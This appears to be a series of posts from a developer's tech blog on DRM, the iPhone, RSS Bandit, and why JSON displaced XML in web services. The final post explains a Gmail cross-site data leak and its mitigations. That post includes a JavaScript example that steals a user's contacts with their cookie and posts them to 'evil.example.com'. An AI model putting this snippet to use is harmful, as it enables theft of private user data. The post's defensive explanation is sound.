The name for the umbrella category for copy-protection software is itself an indefensible euphemism: Digital Rights Management. As consumers, the “rights” enjoyed are few. As some wags have said, the initials D.R.M. should really stand for “Digital Restrictions Management.”

It's weird to see the kind of anti-DRM screed that one typically associates with people like Cory Doctorow getting face time in the New York Times. DRM is bad for society and bad for consumers. It's unfortunate that Microsoft is the company that has made one of the bogeymen of anti-DRM activists a reality. As Mini-Microsoft wrote in his blog post The Good Manager, etc, etc, ...

In the meantime, I think a positive-because-it's-so-negative result of Zune is that it added fire to the DRM debate

No longer is it a theoretical problem that buying a lot of DRMed music from a vendor leaves you vulnerable if the DRM becomes unsupported or falls out of favor, thanks to Zune and its lack of support for PlaysForSure. Now even the New York Times has joined in the rally against DRM.

I have to agree with Mini-Microsoft, this is one of those things that is so bad that it actually turns a 180 and will be good for all of us in the long run.


 

Categories: Technology

My sister is paying me a surprise visit this weekend and I decided to look on the Web for ideas for what we could do together. My initial thoughts were that we'd go to the movies and perhaps check out Bodies: The Exhibition. I wanted to see if I could get a better suggestion on the Web.

My first instinct was to try Seattle - City Search but I had to give up when I realized the only events listed for today were either announcements of what DJs would be at local clubs tonight or announcements of sales at local stores. Another thing that bugged me is how few ratings there were for events or locations on City Search. This reminds me of a blog post on Search Engine Land entitled Local And The Paradox of Participation which came to a set of incorrect conclusions about a poll that claimed people are equally likely to post a positive or negative review of an event or location. The incorrect conclusion was that it is a myth that few people are likely to post reviews. Given that locations and events attended by thousands of people tend to have only dozens of reviews on almost every review site I've ever seen, that seems to make it a fact, not a myth. The poll only implies that people are willing to share their opinion if prompted, which is totally different from someone attending a nightclub or concert and then feeling compelled to visit one of umpteen review sites to share their opinion. What is surprising to me is that there doesn't seem to be even a small community of die-hard reviewers on City Search, which is unlike most review sites I've seen. Just compare Amazon or IMDB, which both seem to have a number of reviewers who are on top of certain categories of products.

Anyway, what does this have to do with Google? Well, I went to Rich Skrenta's much vaunted starting point of the Internet and tried some queries such as "local events", "seattle events" and "events in seattle" with pathetic results. The only useful links in the search results page led me to a couple of event search engines (e.g. NWsource, Upcoming) that were pathetically underpopulated with event information. None of them even had a listing for Bodies: The Exhibition. Lame. 

I tried Google Local which turned out to be a redirect to their mapping site. Shouldn't a local search engine be able to find events in my local area? Double lame.

Before you bother pointing it out, I realize that other search engines don't do a much better job either. This seems to point to an opportunity to add a lot of value in what must be a very lucrative search market. I'm surprised that Yahoo! hasn't figured out how to do more with their purchase of Upcoming.org. Then again, Yahoo! hasn't figured out what to do with any of the Web 2.0 startups they've purchased, so maybe that is expecting too much. Maybe Google will purchase Eventful.com and fix this fairly big hole in their search offerings. Somehow I doubt it.


 

I checked out the official Apple iPhone site, especially the screencasts of the phone user interface and iPod capabilities. As an iPod owner, $500 is worth it just to get my hands on this next generation iPod which makes my Video iPod look old and busted. On the other hand, although the text messaging UI is pretty sweet, a cellphone without tactile feedback when pushing its buttons is a pain in the ass, especially when the layout of the buttons continually changes. I wouldn't wish that on my worst enemy. Maybe I'm just unusual in the fact that I don't want to be required to look at the cellphone's screen when using it. I pull my phone out of my pocket, unlock it and call the last number dialed often without looking at the screen before putting it to my ear. It's hard to imagine that my muscle memory would ever get used to doing that without tactile feedback from the phone when navigating its interface. It also hasn't been announced whether the phone will be able to sync with Microsoft Exchange or not. As someone who used his phone to keep on top of the goings on at work while at CES, this is another non-starter.

That said, I have to agree with a lot of the stuff said in the article Macworld: Ten Myths of the Apple iPhone. A lot of the complaints about the iPhone just seem like sour grapes. Me, I'm going to wait until I can get an unlocked iPhone so I don't have to replace my Cingular 3125 or until Apple ships a 6th generation iPod (aka iPhone sans phone features).


 

Categories: Technology

From the Reuters article R&B sales slide alarms music biz we learn

With the exception of new age, the smallest genre tracked by Nielsen SoundScan, R&B and rap suffered the biggest declines in 2006 of all styles of music. R&B, with album scans of 117 million units, was down 18.4% from 2005, while the rap subgenre's 59.5 million scans were down 20.7%. Total U.S. album sales fell 4.9% to 588.2 million units. Since 2000, total album sales have slid 25%, but R&B is down 41.4% and rap down 44.4%. In 2000, R&B accounted for 25.4% of total album sales, and rap 13.6%. In 2006, their respective shares fell to nearly 20% and 10%.
...
Merchants point to large second-week declines in new albums. For example, Jay-Z's 2006 "Kingdom Come" album debuted with 680,000 units in its first week and then dropped nearly 80%, to almost 140,000 units.
...
"Downloading and Internet file sharing is a problem and the labels are really late in fixing it," Czar Entertainment CEO and manager of the Game Jimmy Rosemond says. "With an artist like Game, his album leaked before it came out, and I had 4 million people downloading it."
...
In 2006, the best-selling rap album was T.I.'s "King," which sold 1.6 million copies, while the best-selling R&B album was Beyonce's "B'Day," which moved 1.8 million units. But those are exceptions.
...
A senior executive at one major label says ringtone revenue now exceeds track download revenue. And since Nielsen RingScan started tracking master ringtones in September, rap and R&B have comprised 87% of scans generated by the top 10 sellers.

Interscope's Marshall points out that Jibbs, for example, "has sold an incredible 1.4 million ringtones" -- a figure that might well offset lost album revenue. The rapper has moved 196,000 units of his "Jibbs Feat. Jibbs" album since its October 24 release. But figuring the ringtones he's sold at $2 apiece translates into $2.8 million in revenue, the equivalent of another 233,000 albums at a wholesale cost of $12 per unit.

And, Marshall adds, Chamillionaire has moved more than 3 million ringtones on top of scanning nearly 900,000 units of his "Sound of Revenge" album.

Some look at the above data and see it as an argument that the long tail spells the end of the hit. Others look at it and see it as more evidence that piracy is destroying the music industry. Or it may just be a sign that hip hop is finally played out. Me, I look at the ringtone industry and wonder whether it doesn't stand out as an example of where walled gardens and closed platforms have worked out quite well for the platform vendors and their partners yet [almost] detrimentally for consumers.


 

Categories: Current Affairs

Recently an RSS Bandit user made a feature request on our forums about a Good Google Reader Feature and wrote

On RSS Bandit, while reading all the news from a feed at the same time on the reading pane (feed selected) and scrolling down to read all news, you scroll all the page and nothing is marked as readed. This only happen when you select the message on Feed Details. On Google Reader every new you scroll down became marked as readed automatically. It's a very simple and natural scheme. Works really well, just check out http://reader.google.com.

I checked out Google Reader and I had to agree that the feature is pretty hot, so yesterday I brushed up on my knowledge of the HTML DOM and added the feature to RSS Bandit. Below is a video showing the new feature in action

What's funny is that Andy Edmonds asked me for this feature a couple of years ago and I never attempted to add it because at the time I was intimidated by Javascript and DHTML. It turned out to be a lot easier than I thought.

RSS Bandit users can expect to see this feature in the next beta of the Jubilee release which should be available in the next week and a half. It would be sooner but unfortunately I'm on my way to Las Vegas to attend CES for most of next week and Torsten is on vacation. By the way, users of Windows Vista should be glad to know that the next beta will finally run fine on that operating system.

NOTE: The slowness in the video is due to the fact that my CPU is pegged at 100% while capturing the screencast with Windows Media Encoder. This feature doesn't noticeably affect the performance of the application while running regularly.


 

Categories: RSS Bandit

Joel Spolsky has a seminal article entitled Don't Let Architecture Astronauts Scare You where he wrote

A recent example illustrates this. Your typical architecture astronaut will take a fact like "Napster is a peer-to-peer service for downloading music" and ignore everything but the architecture, thinking it's interesting because it's peer to peer, completely missing the point that it's interesting because you can type the name of a song and listen to it right away.

All they'll talk about is peer-to-peer this, that, and the other thing. Suddenly you have peer-to-peer conferences, peer-to-peer venture capital funds, and even peer-to-peer backlash with the imbecile business journalists dripping with glee as they copy each other's stories: "Peer To Peer: Dead!"

 The Architecture Astronauts will say things like: "Can you imagine a program like Napster where you can download anything, not just songs?" Then they'll build applications like Groove that they think are more general than Napster, but which seem to have neglected that wee little feature that lets you type the name of a song and then listen to it -- the feature we wanted in the first place. Talk about missing the point. If Napster wasn't peer-to-peer but it did let you type the name of a song and then listen to it, it would have been just as popular.

This article is relevant because I recently wrote a series of posts explaining why Web developers have begun to favor JSON over XML in Web services. My motivation for writing that series was a set of conversations I'd had with former co-workers who seemed intent on "abstracting" the discussion and comparing whether JSON is a better data format than XML in all the cases XML is used today, instead of understanding the context in which JSON has become popular.

In the past two weeks, I've seen three different posts from various XML heavy hitters committing this very sin

  1. JSON and XML by Tim Bray - This kicked things off by firing some easily refutable allegations about the extensibility and Unicode capabilities of JSON as a general data transfer format.
  2. Tim Bray on JSON and XML by Don Box - Refutes the allegations by Tim Bray above but still misses the point.
  3. All markup ends up looking like XML by David Megginson - argues that XML is just like JSON except with the former we use angle brackets and in the latter we use curly braces + square brackets. Thus they are "Turing" equivalent. Academically interesting but not terribly useful information if you are a Web developer trying to get things done.

This is my plea to you, if you are an XML guru and you aren't sure why JSON seems to have come out of nowhere to threaten your precious XML, go read JSON vs. XML: Browser Security Model and JSON vs. XML: Browser Programming Models then let's have the discussion.

If you're too busy to read them, here's the executive summary. JSON is a better fit for Web services that power Web mashups and AJAX widgets because it gets around the cross-domain limitations put in place by browsers that hamper XMLHttpRequest, and because it is essentially serialized Javascript objects, which makes it a better fit for client-side scripting, which is primarily done in Javascript. That's it. XML will never fit the bill as well for these scenarios without changes to the existing browser ecosystem, which I doubt are forthcoming anytime soon.

Update: See comments by David Megginson and Steve Marx below.


 

Categories: XML

It's a new year and time for another brand new Windows Live service to show up in beta. This time it's the Windows Live for TV Beta which is described as follows

What it is
Windows Live™ for TV Beta is a rich, graphically-driven interface designed for people who use Windows Live Spaces and Messenger and Live Call on large-screen monitors and TVs. We're still in the early stages of this beta, so many of the features might not work properly yet. That's why we really need your feedback! This beta is in limited release, so you must request access to the trial group. After you’re in the beta, come back to this page and let us know what you think.

You can also find out more about the product on the team's blog at http://wlfortv.spaces.live.com which includes the following screenshot

Hey, I think I can see me in that screen shot. :)


 

Categories: Windows Live

A perennial topic for debate on certain mailing lists at work is rich client (i.e. desktop) software versus Web-based software. For every person who sings the praises of a Web-based program such as Windows Live Mail, there's someone wagging their finger who points out that "it doesn't work offline" and "not everyone has a broadband connection". A lot of these discussions have become permathreads on some of the mailing lists I'm on, and I can recite the detailed arguments for both sides in my sleep.

However I think both sides miss the point and agree more than they disagree. The fact is that in highly connected societies such as North America and Western Europe, computer usage overlaps almost completely with internet usage (see Nielsen statistics for U.S. homes and Top 25 most connected countries). This trend will only increase as internet penetration spreads across developing countries (er, emerging markets). 

What is important to understand is that for a lot of computer users, their computer is an overpriced paperweight if it doesn't have an Internet connection. They can't read the news, can't talk to their friends via IM, can't download music to their iPods (er, Zunes), can't people watch on Facebook or MySpace, can't share the pictures they just took with their digital cameras, can't catch up on the goings on at work via email, can't look up driving directions, can't check the weather report, can't do research for any reports they have to write, and the list goes on. Keeping in mind that connectivity is key is far more important than whether the user experience is provided via a desktop app written using Win32 or a "Web 2.0" website powered by AJAX. Additionally, the value of approachability and ease of use over "features" and "richness" cannot be emphasized enough.

Taken from that perspective, a lot of things people currently consider "features" of desktop applications are actually bugs in today's Internet-connected world. For example, I have different files in the "My Documents" folders on the 3 or 4 PCs I use regularly. Copying files between PCs and keeping track of what version of what file is where is an annoyance. FolderShare to the rescue.

When I'm listening to my music on my computer I sometimes want to be able to find out what music my friends are listening to, recommend my music to friends or just find music similar to what I'm currently playing. Last.fm and iLike to the rescue.

The last time I was on vacation in Nigeria, I wanted to check up on what was going on at work but never had access to a computer with Outlook installed, nor could I have set it up to talk to my corporate account even if I had. Outlook Web Access to the rescue.

Are these arguments for Web-based or desktop software? No. Instead they are meant to point out that improving the lives of computer users should mean finding better ways of harnessing their internet connections and their social connections to others. Sometimes that will mean desktop software, sometimes it will mean Web-based software, and sometimes it will mean both.


 

Categories: Technology

Over the holidays I had a chance to talk to some of my old compadres from the XML team at Microsoft and we got to talking about JSON as an alternative to XML. I concluded that there are a small number of key reasons why JSON is now more attractive than XML for the kinds of data interchange that power Web-based mashups and Web widgets. This is the second in a series of posts on what those key reasons are.

In my previous post, I mentioned that getting around the limitations on cross-domain requests imposed by modern browsers has been a key reason for the increased adoption of JSON. However, this is only part of the story.

Early on in the adoption of AJAX techniques across various Windows Live services, I noticed that even when building pages with no cross-domain requirements, our Web developers favored JSON over XML. One reason that kept coming up is that processing JSON responses on the client offers an easier programming model than processing XML. I'll illustrate this difference in ease of use via JScript code that processes a sample document, taken from the JSON website, in both XML and JSON formats. Below is the code sample

var json_menu = '{"menu": {' + '\n' +
'"id": "file",' + '\n' +
'"value": "File",' + '\n' +
'"popup": {' + '\n' +
'"menuitem": [' + '\n' +
'{"value": "New", "onclick": "CreateNewDoc()"},' + '\n' +
'{"value": "Open", "onclick": "OpenDoc()"},' + '\n' +
'{"value": "Close", "onclick": "CloseDoc()"}' + '\n' +
']' + '\n' +
'}' + '\n' +
'}}';


var xml_menu = '<menu id="file" value="File">' + '\n' +
'<popup>' + '\n' +
'<menuitem value="New" onclick="CreateNewDoc()" />' + '\n' +
'<menuitem value="Open" onclick="OpenDoc()" />' + '\n' +
'<menuitem value="Close" onclick="CloseDoc()" />' + '\n' +
'</popup>' + '\n' +
'</menu>';

WhatHappensWhenYouClick_Xml(xml_menu);
WhatHappensWhenYouClick_Json(json_menu);

function WhatHappensWhenYouClick_Json(data){

  var j = eval("(" + data + ")");

  WScript.Echo("
When you click the " + j.menu.value + " menu, you get the following options");

  for(var i = 0; i < j.menu.popup.menuitem.length; i++){
   WScript.Echo((i + 1) + "." + j.menu.popup.menuitem[i].value
    + " aka " + j.menu.popup.menuitem[i].onclick);
  }

}

function WhatHappensWhenYouClick_Xml(data){

  var x = new ActiveXObject( "Microsoft.XMLDOM" );
  x.loadXML(data);

  WScript.Echo("When you click the " + x.documentElement.getAttribute("value")
                + " menu, you get the following options");

  var nodes = x.documentElement.selectNodes("//menuitem");

  for(var i = 0; i < nodes.length; i++){
   WScript.Echo((i + 1) + "." + nodes[i].getAttribute("value") + " aka " + nodes[i].getAttribute("onclick"));
  }
}

When comparing the two sample functions, it seems clear that the XML version takes more code and requires a layer of mental indirection, since the developer has to be knowledgeable about XML APIs and their idiosyncrasies. We should dig a little deeper into this. 

A couple of people have already replied to my previous post to point out that any good Web application should validate JSON responses to ensure they are not malicious. This means my usage of eval() in the code sample should be replaced with a JSON parser that only accepts 'safe' JSON responses. Given that there are JSON parsers available that come in under 2KB, that particular security issue is not a deal breaker.
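
For the curious, here's a rough sketch of what such a check might look like, in the spirit of the validation done by the json.org reference parsers. The function name is mine and the regular expressions are simplified, so treat this as a sketch rather than a production parser:

// Sketch of a 'safe' JSON parse: neutralize escape sequences, strip out
// string literals, then make sure nothing is left but JSON punctuation,
// numbers and the true/false/null keywords before calling eval().
function parseJsonSafely(text){

  var stripped = text.replace(/\\./g, '@').replace(/"[^"\\\n\r]*"/g, '');

  if (/^[\[\],:{}\s0-9.\-+Eaeflnr-u]*$/.test(stripped)) {
    return eval('(' + text + ')');
  }

  throw new Error("Input is not valid JSON");
}

var safe_menu = parseJsonSafely(json_menu);  // same object graph as the eval() version above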

On the XML front, there is no off-the-shelf way to get a programming model as straightforward and as flexible as the one obtained by parsing JSON directly into objects using eval(). One light on the horizon is the possibility that E4X becomes widely implemented in Web browsers. With E4X, the code for processing the XML version of the menu document above would be 

function WhatHappensWhenYouClick_E4x(data){

  var e = new XML(data);

  WScript.Echo("When you click the " + j.menu.value + " menu, you get the following options");

  foreach(var m in e.menu.popup.menuitem){
   WScript.Echo( m.@value + " aka " + m.@onclick);
  }

}

However, as cool as the language seems to be, it is unclear whether E4X will ever see mainstream adoption. There is an initial implementation of E4X in the engine that powers the Firefox browser, though it seems to be incomplete. On the other hand, there is no indication that either Opera or Internet Explorer will support E4X in the future.

Another option for getting a simpler, object-centric programming model out of XML data could be to adopt a simple XML serialization format such as XML-RPC and provide off-the-shelf Javascript parsers for this format. A trivial implementation could convert XML-RPC to JSON using XSLT and then eval() the results. However, it is unlikely that people would go through that trouble when they can just use JSON.
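
As a rough illustration of the idea (skipping the XSLT step and building the objects straight from the MSXML DOM instead), a minimal converter for XML-RPC values might look something like the following. The function name is mine, the xmlrpc_response variable is hypothetical, and only the common XML-RPC types are handled:

// Sketch: recursively convert an XML-RPC <value> element into the
// equivalent JavaScript object, array or scalar.
function xmlRpcValueToObject(valueNode){

  var child = valueNode.selectSingleNode("*");
  if (child == null) return valueNode.text;    // bare text inside <value> is a string

  switch (child.nodeName) {
    case "struct":
      var obj = {};
      var members = child.selectNodes("member");
      for (var i = 0; i < members.length; i++) {
        obj[members[i].selectSingleNode("name").text] =
          xmlRpcValueToObject(members[i].selectSingleNode("value"));
      }
      return obj;
    case "array":
      var arr = [];
      var values = child.selectNodes("data/value");
      for (var j = 0; j < values.length; j++) {
        arr[arr.length] = xmlRpcValueToObject(values[j]);
      }
      return arr;
    case "int": case "i4": case "double":
      return Number(child.text);
    case "boolean":
      return child.text == "1";
    default:                                     // string, dateTime.iso8601, base64
      return child.text;
  }
}

// Hypothetical usage against an XML-RPC method response held in xmlrpc_response
var x = new ActiveXObject("Microsoft.XMLDOM");
x.loadXML(xmlrpc_response);
var result = xmlRpcValueToObject(x.selectSingleNode("//params/param/value"));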

This may be another nail in the coffin of XML on the Web. 


 

Categories: Web Development | XML | XML Web Services

Over the holidays I had a chance to talk to some of my old compadres from the XML team at Microsoft and we got to talking about JSON as an alternative to XML. I concluded that there are a small number of key reasons why JSON is now more attractive than XML for the kinds of data interchange that power Web-based mashups and Web widgets. This is the first in a series of posts on what those key reasons are.

The first "problem" that chosing JSON over XML as the output format for a Web service solves is that it works around security features built into modern browsers that prevent web pages from initiating certain classes of communication with web servers on domains other than the one hosting the page. This "problem" is accurately described in the XML.com article Fixing AJAX: XMLHttpRequest Considered Harmful which is excerpted below

But the kind of AJAX examples that you don't see very often (are there any?) are ones that access third-party web services, such as those from Amazon, Yahoo, Google, and eBay. That's because all the newest web browsers impose a significant security restriction on the use of XMLHttpRequest. That restriction is that you aren't allowed to make XMLHttpRequests to any server except the server where your web page came from. So, if your AJAX application is in the page http://www.yourserver.com/junk.html, then any XMLHttpRequest that comes from that page can only make a request to a web service using the domain www.yourserver.com. Too bad -- your application is on www.yourserver.com, but their web service is on webservices.amazon.com (for Amazon). The XMLHttpRequest will either fail or pop up warnings, depending on the browser you're using.

On Microsoft's IE 5 and 6, such requests are possible provided your browser security settings are low enough (though most users will still see a security warning that they have to accept before the request will proceed). On Firefox, Netscape, Safari, and the latest versions of Opera, the requests are denied. On Firefox, Netscape, and other Mozilla browsers, you can get your XMLHttpRequest to work by digitally signing your script, but the digital signature isn't compatible with IE, Safari, or other web browsers.
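
To make the restriction concrete, here's roughly what such a denied request looks like in practice; the Amazon URL is just a placeholder for any third-party endpoint:

// A page served from www.yourserver.com trying to call a third-party API
// directly. Depending on the browser this either throws an exception,
// silently fails, or triggers a security prompt.
var xhr = window.XMLHttpRequest ? new XMLHttpRequest()
                                : new ActiveXObject("Microsoft.XMLHTTP");
try {
  xhr.open("GET", "http://webservices.amazon.com/onca/xml", false);
  xhr.send(null);      // blocked: the target domain differs from the page's domain
  alert(xhr.responseText);
} catch (e) {
  alert("Cross-domain request denied: " + e.message);
}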

This restriction is a significant annoyance for Web developers because it rules out a number of compelling end-user applications. However, there are a number of common workarounds, which are also listed in the article

Solutions Worthy of Paranoia

There is hope, or rather, there are gruesome hacks, that can bring the splendor of seamless cross-browser XMLHttpRequests to your developer palette. The three methods currently in vogue are:

  1. Application proxies. Write an application in your favorite programming language that sits on your server, responds to XMLHttpRequests from users, makes the web service call, and sends the data back to users.
  2. Apache proxy. Adjust your Apache web server configuration so that XMLHttpRequests can be invisibly re-routed from your server to the target web service domain.
  3. Script tag hack with application proxy (doesn't use XMLHttpRequest at all). Use the HTML script tag to make a request to an application proxy (see #1 above) that returns your data wrapped in JavaScript. This approach is also known as On-Demand JavaScript.

Although the first two approaches work, there are a number of problems with them. The first is that they require the owner of the page to have webmaster-level access to a Web server and either tweak its configuration settings or be a savvy enough programmer to write an application that proxies requests between a user's browser and the third-party web service. A second problem is that they significantly increase the cost and scalability impact of the page, because the Web page author now has to create a connection to the third-party Web service for each user viewing the page instead of the user's browser making the connection. This can lead to a bottleneck, especially if the page becomes popular. A final problem is that if the third-party service requires authentication [via cookies] then there is no way to pass this information through the Web page author's proxy due to browser security models.

The third approach avoids all of these problems without a significant cost to either the Web page author or the provider of the Web service. An example of how this approach is utilized in practice is described in Simon Willison's post JSON and Yahoo!’s JavaScript APIs where he writes

As of today, JSON is supported as an alternative output format for nearly all of Yahoo!’s Web Service APIs. This is a Really Big Deal, because it makes Yahoo!’s APIs available to JavaScript running anywhere on the web without any of the normal problems caused by XMLHttpRequest’s cross domain security policy.

Like JSON itself, the workaround is simple. You can append two arguments to a Yahoo! REST Web Service call:

&output=json&callback=myFunction

The page returned by the service will look like this:

myFunction({ JSON data here });

You just need to define myFunction in your code and it will be called when the script is loaded. To make cross-domain requests, just dynamically create your script tags using the DOM:

var script = document.createElement('script');
script.type = 'text/javascript';
script.src = '...' + '&output=json&callback=myFunction';
document.getElementsByTagName('head')[0].appendChild(script);
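
To make that concrete, the callback on the hosting page might look something like the following. The shape of the response object here is a guess at what a Yahoo! search call returns, and the 'results' element is made up, so adjust both to the actual API you're calling:

// Hypothetical callback invoked when the dynamically-added script loads;
// it just renders whatever results came back into the page.
function myFunction(data) {
  var results = (data.ResultSet && data.ResultSet.Result) ? data.ResultSet.Result : [];
  var html = '';
  for (var i = 0; i < results.length; i++) {
    html += '<li>' + results[i].Title + '</li>';
  }
  document.getElementById('results').innerHTML = '<ul>' + html + '</ul>';
}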

People who are security minded will likely be shocked that this technique involves Web pages executing arbitrary code retrieved from a third-party site, since this seems like a security flaw waiting to happen, especially if the third-party site becomes compromised. One might also wonder what the point is of browsers restricting cross-domain HTTP requests if pages can load and run arbitrary Javascript code [not just XML data] from any domain.

However, despite these concerns, it gets the job done with minimal cost to all parties involved, and more often than not that is all that matters.

Postscript: When reading articles like Tim Bray's JSON and XML, which primarily compares the two data formats based on their physical qualities, it is good to keep the above information in mind, since it explains a key reason JSON is popular on the Web today that turns out to be independent of any physical qualities of the data format. 


 

Categories: Web Development | XML | XML Web Services

Over the holidays I had a chance to talk to some of my old compadres from the XML team at Microsoft and we got to talking about JSON as an alternative to XML. I concluded that there are a small number of key reasons why JSON is now more attractive than XML for the kinds of data interchange that power Web-based mashups and Web widgets. Expect a series of posts on this later today. 

I wasn't sure I was going to write about this until I saw Mike Arrington's blog post about a GMail vulnerability, which implied that this is another data point in the XML vs. JSON debate. After reading about the vulnerability on Slashdot, I disagree. This seems like a garden-variety cross site scripting vulnerability that is independent of JSON or XML, and it is succinctly described in the Slashdot comment by TubeSteak which states

Here's the super simple explanation

1. Gmail sets a cookie saying you're logged in
2. A [3rd party] javascript tells you to call Google's script
3. Google checks for the Gmail cookie
4. The cookie is valid
5. Google hands over the requested data to you

If [3rd party] wanted to keep your contact list, the javascript would pass it to a form and your computer would happily upload the list to [3rd party]'s server.
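
In web-page terms, the attack sketched above boils down to something like the following. The Google URL, the callback mechanics, and the response shape here are placeholders rather than the actual endpoint that was vulnerable:

// [on evil.example.com] Add a script tag pointing at a Google URL that
// returns the signed-in user's contacts as JavaScript. The victim's browser
// attaches their Gmail cookie to the request, so the data comes back, and
// the callback ships it off to the attacker via an ordinary form post.
function stealContacts(data) {
  var form = document.createElement('form');
  form.method = 'POST';
  form.action = 'http://evil.example.com/collect';
  var field = document.createElement('input');
  field.type = 'hidden';
  field.name = 'contacts';
  field.value = String(data);      // serialize however the attacker likes
  form.appendChild(field);
  document.body.appendChild(form);
  form.submit();                   // uploads the list to the attacker's server
}

var s = document.createElement('script');
s.src = 'http://mail.google.com/fake-contacts-endpoint?callback=stealContacts';
document.getElementsByTagName('head')[0].appendChild(s);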

Mitigations to this problem are well known and are summarized in another Slashdot comment by buro9, who writes

When you surface data via Xml web services, you can only call the web service on the domain that the JavaScript calling it originates from. So if you write your web services with AJAX in mind exclusively, then you have made the assumption that JavaScript is securing your data.

The problem is created at two points:
1) When you rely on cookies to perform the implicit authentication that reveals the data.
2) When you allow rendering of the data in JSON which bypasses JavaScript cross-domain security.

This can be solved by doing two things:
1) Make one of the parameters to a web service a security token that authenticates the request.
2) Make the security token time-sensitive (a canary) so that a compromised token does not work if sniffed and used later.

The surprising thing is that I'd assumed knowledge of canary values was commonplace, but it took a lot longer than I expected to find a good bite-sized description of them. When I did, it came from my co-worker Yaron Goland in a comment to Mark Nottingham's post on DOM vs. Web, where Yaron wrote

There are a couple of ways to deal with this situation:

Canaries - These are values that are generated on the fly and sent down with pages that contain forms. In the previous scenario evil.com wouldn't know what canary site X was using at that instant for that user and so its form post wouldn't contain the right value and would therefore be rejected. The upside about canaries is that they work with any arbitrary form post. The downside is that they require some server side work to generate and monitor the canary values. Hotmail, I believe, uses canaries.

Cookies - A variant on canaries is to use cookies where the page copies a value from a cookie into the form before sending it up. Since the browser security model only allows pages from the same domain to see that domain's cookie you know the page had to be from your domain. But this only works if the cookie header value isn't easily guessable so in practice it's really just canaries.

XMLHTTP - Using XMLHTTP it's possible to add HTTP headers so just throw in a header of any sort. Since forms can't add headers you know the request came from XMLHTTP and because of XMLHTTP's very strict domain security model you know the page that sent the request had to come from your site.
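
As a concrete illustration of the cookie variant Yaron describes, the client-side half might look roughly like this. The cookie name, field name and form wiring are all made up, and the server still has to compare the submitted value against the cookie it issued:

// Copy the canary value out of a cookie that only our own pages can read
// and stamp it into a hidden form field just before the form is submitted.
// A forged cross-site form post won't know this value, so the server
// rejects it.
function readCookie(name) {
  var parts = document.cookie.split(';');
  for (var i = 0; i < parts.length; i++) {
    var pair = parts[i].replace(/^\s+/, '').split('=');
    if (pair[0] == name) return pair[1];
  }
  return null;
}

function stampCanary(form) {
  form.elements['canary'].value = readCookie('canary');
  return true;
}

// Hooked up as <form onsubmit="return stampCanary(this);"> with a hidden input named 'canary'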

I guess just because something is common knowledge among folks building Web apps and toolkits at Microsoft doesn't mean it is common knowledge on the Web. This is another one of those things that everyone building Web applications should know about in order to secure their applications, but that very few actually learn.


 

Categories: Web Development